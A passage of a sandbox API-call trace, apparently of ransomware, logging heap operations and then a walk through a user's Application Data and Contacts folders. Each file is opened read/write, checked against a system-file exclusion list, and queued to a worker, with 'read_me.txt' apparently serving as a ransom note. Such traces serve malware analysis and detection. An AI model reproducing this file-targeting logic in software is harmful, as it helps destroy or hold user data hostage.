hHeap=0x4f10000) returned 1 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.425] GetProcessHeap () returned 0x4f10000 [0075.425] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0075.426] GetProcessHeap () returned 0x4f10000 [0075.426] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.427] GetProcessHeap () returned 0x4f10000 [0075.427] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0075.428] GetProcessHeap () returned 0x4f10000 [0075.428] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d8f0d0 [0075.429] GetProcessHeap () returned 0x4f10000 [0075.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.429] GetProcessHeap () returned 0x4f10000 [0075.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0075.429] GetProcessHeap () returned 0x4f10000 [0075.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0075.429] GetProcessHeap () returned 0x4f10000 [0075.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7d8f0d0 [0075.429] GetProcessHeap () returned 0x4f10000 [0075.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0075.429] GetProcessHeap () returned 0x4f10000 [0075.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0075.429] GetProcessHeap () returned 0x4f10000 [0075.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0075.429] GetProcessHeap () returned 0x4f10000 [0075.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d8f0d0 | out: hHeap=0x4f10000) returned 1 [0075.429] GetProcessHeap () returned 0x4f10000 [0075.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0075.429] SetFilePointerEx (in: hFile=0x79c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.429] WriteFile (in: hFile=0x79c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0075.434] WriteFile (in: hFile=0x79c, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0075.434] GetProcessHeap () returned 0x4f10000 [0075.434] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d84500 | out: hHeap=0x4f10000) returned 1 [0075.434] GetProcessHeap () returned 0x4f10000 [0075.434] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0075.434] GetProcessHeap () returned 0x4f10000 [0075.434] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0075.434] CloseHandle (hObject=0x79c) returned 1 [0075.920] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 4 [0075.920] GetProcessHeap () returned 0x4f10000 [0075.920] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8dd10f8 [0075.921] wnsprintfW (in: pszDest=0x8dd10f8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*") returned 52 [0075.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x77f, ftCreationTime.dwLowDateTime=0x8ab0060, ftCreationTime.dwHighDateTime=0x4f136d0, ftLastAccessTime.dwLowDateTime=0xf7a, ftLastAccessTime.dwHighDateTime=0x84afbb0, ftLastWriteTime.dwLowDateTime=0x771945d6, ftLastWriteTime.dwHighDateTime=0x4f10000, nFileSizeHigh=0xd844f8, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="䓸ߘ", cAlternateFileName="")) returned 0xffffffff [0075.921] wnsprintfW (in: pszDest=0x8dd10f8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\read_me.txt") returned 62 [0075.921] GetProcessHeap () returned 0x4f10000 [0075.921] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8dd10f8 | out: hHeap=0x4f10000) returned 1 [0075.921] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 36 [0075.921] GetProcessHeap () returned 0x4f10000 [0075.921] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8af0080 | out: hHeap=0x4f10000) returned 1 [0075.921] GetProcessHeap () returned 0x4f10000 [0075.921] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8af0080 [0075.922] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*") returned 44 [0075.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x245e6c80, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x245e6c80, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.922] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\.") returned 44 [0075.922] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x245e6c80, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x245e6c80, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.922] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\..") returned 45 [0075.922] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0075.922] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0075.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.929] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="read_me.txt") returned 0x0 [0075.929] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="autoexec.bat") returned 0x0 [0075.929] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="desktop.ini") returned 0x0 [0075.929] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="autorun.inf") returned 0x0 [0075.929] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="ntuser.dat") returned 0x0 [0075.929] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="iconcache.db") returned 0x0 [0075.930] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="bootsect.bak") returned 0x0 [0075.930] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="boot.ini") returned 0x0 [0075.930] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="ntuser.dat.log") returned 0x0 [0075.930] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="thumbs.db") returned 0x0 [0075.930] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 6 [0075.930] QueueUserWorkItem (Function=0x404e00, Context=0x7a0, Flags=0x0) returned 1 [0075.930] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0075.930] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0075.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.931] StrStrW (lpFirst="administrator.contact", lpSrch="read_me.txt") returned 0x0 [0075.931] StrStrW (lpFirst="administrator.contact", lpSrch="autoexec.bat") returned 0x0 [0075.931] StrStrW (lpFirst="administrator.contact", lpSrch="desktop.ini") returned 0x0 [0075.931] StrStrW (lpFirst="administrator.contact", lpSrch="autorun.inf") returned 0x0 [0075.931] StrStrW (lpFirst="administrator.contact", lpSrch="ntuser.dat") returned 0x0 [0075.931] StrStrW (lpFirst="administrator.contact", lpSrch="iconcache.db") returned 0x0 [0075.931] StrStrW (lpFirst="administrator.contact", lpSrch="bootsect.bak") returned 0x0 [0075.931] StrStrW (lpFirst="administrator.contact", lpSrch="boot.ini") returned 0x0 [0075.931] StrStrW (lpFirst="administrator.contact", lpSrch="ntuser.dat.log") returned 0x0 [0075.931] StrStrW (lpFirst="administrator.contact", lpSrch="thumbs.db") returned 0x0 [0075.931] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 7 [0075.931] QueueUserWorkItem (Function=0x404e00, Context=0x7b4, Flags=0x0) returned 1 [0075.931] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0075.931] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0075.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.931] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="read_me.txt") returned 0x0 [0075.931] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="autoexec.bat") returned 0x0 [0075.931] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="desktop.ini") returned 0x0 [0075.932] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="autorun.inf") returned 0x0 [0075.932] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="ntuser.dat") returned 0x0 [0075.932] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="iconcache.db") returned 0x0 [0075.932] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="bootsect.bak") returned 0x0 [0075.932] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="boot.ini") returned 0x0 [0075.932] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="ntuser.dat.log") returned 0x0 [0075.932] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="thumbs.db") returned 0x0 [0075.932] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 8 [0075.932] QueueUserWorkItem (Function=0x404e00, Context=0x7b8, Flags=0x0) returned 1 [0075.932] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0075.932] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0075.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d4 [0075.946] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="read_me.txt") returned 0x0 [0075.946] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="autoexec.bat") returned 0x0 [0075.946] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="desktop.ini") returned 0x0 [0075.946] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="autorun.inf") returned 0x0 [0075.946] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="ntuser.dat") returned 0x0 [0075.946] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="iconcache.db") returned 0x0 [0075.946] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="bootsect.bak") returned 0x0 [0075.947] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="boot.ini") returned 0x0 [0075.947] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="ntuser.dat.log") returned 0x0 [0075.947] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="thumbs.db") returned 0x0 [0075.947] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 23 [0075.947] QueueUserWorkItem (Function=0x404e00, Context=0x7d4, Flags=0x0) returned 1 [0075.947] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.947] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0075.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d8 [0075.947] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0075.947] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0075.947] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0075.947] CloseHandle (hObject=0x7d8) returned 1 [0075.947] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0075.947] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0075.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0075.970] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="read_me.txt") returned 0x0 [0075.970] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="autoexec.bat") returned 0x0 [0075.970] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="desktop.ini") returned 0x0 [0075.970] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="autorun.inf") returned 0x0 [0075.970] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="ntuser.dat") returned 0x0 [0075.970] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="iconcache.db") returned 0x0 [0075.971] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="bootsect.bak") returned 0x0 [0075.971] StrStrW 